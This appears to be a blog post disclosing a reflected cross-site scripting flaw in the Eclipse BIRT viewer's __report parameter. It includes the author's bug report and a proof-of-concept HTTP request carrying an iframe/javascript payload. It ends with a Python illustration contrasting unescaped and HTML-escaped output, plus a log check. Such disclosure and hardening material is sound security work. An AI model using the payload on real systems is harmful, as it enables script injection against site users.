Eclipse BIRT reflected XSS
While analysing a few JEE applications that use BIRT as their default report/graph generation engine, I found a reflected XSS hole. They will fix it in version 2.5.0 (a milestone build), even though the latest stable production version is currently 2.3.1: quite funny.
Here below is my post on bugs.eclipse.org:
A Reflected XSS is present in the __report parameter: here below the modified request (that is the BIRT 2.2.1 version included in Konakart 2.2.6):

GET /birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>&r=-703171660 HTTP/1.1
Host: localhost:8780
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8780/konakartadmin/

Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is actually old I guess. I don't have the time to try the exploit on newer versions, I leave this to you, even if I suppose that newer versions will be vulnerable too.

Thanks
Michele Orru'
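As an added illustration (not code from the bug report or from BIRT itself), the snippet below pulls the __report value out of the request line quoted above, shows a hypothetical unencoded reflection of that value next to the same reflection with HTML attribute encoding applied, and includes a simple check that a log reviewer could run over request lines; the input/hidden markup and the function names are assumptions for illustration only.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Request line reconstructed from the bug report above (whitespace normalized).
REQUEST_LINE = (
    "GET /birt-viewer/run?__report='\"><iframe%20src=javascript:alert(666)>"
    "&r=-703171660 HTTP/1.1"
)


def report_param(request_line: str) -> str:
    """Return the URL-decoded __report query parameter from an HTTP request line."""
    target = request_line.split(" ")[1]
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params.get("__report", [""])[0]


def render_vulnerable(report: str) -> str:
    """Hypothetical reflection of the parameter with no output encoding.

    This mirrors the class of bug in the report; it is not the viewer's real markup.
    """
    return f'<input type="hidden" name="__report" value="{report}">'


def render_hardened(report: str) -> str:
    """Same reflection, but the value is HTML-attribute encoded before insertion.

    html.escape(quote=True) turns < > & " ' into entities, so the browser sees text,
    not markup, regardless of what the client sent.
    """
    return f'<input type="hidden" name="__report" value="{html.escape(report, quote=True)}">'


def looks_like_injection(report: str) -> bool:
    """Cheap triage check for request logs: a report name should never carry markup metacharacters."""
    return any(ch in report for ch in "<>\"'")


if __name__ == "__main__":
    value = report_param(REQUEST_LINE)
    print("decoded __report :", value)
    print("vulnerable output:", render_vulnerable(value))
    print("hardened output  :", render_hardened(value))
    print("flag in logs     :", looks_like_injection(value))
```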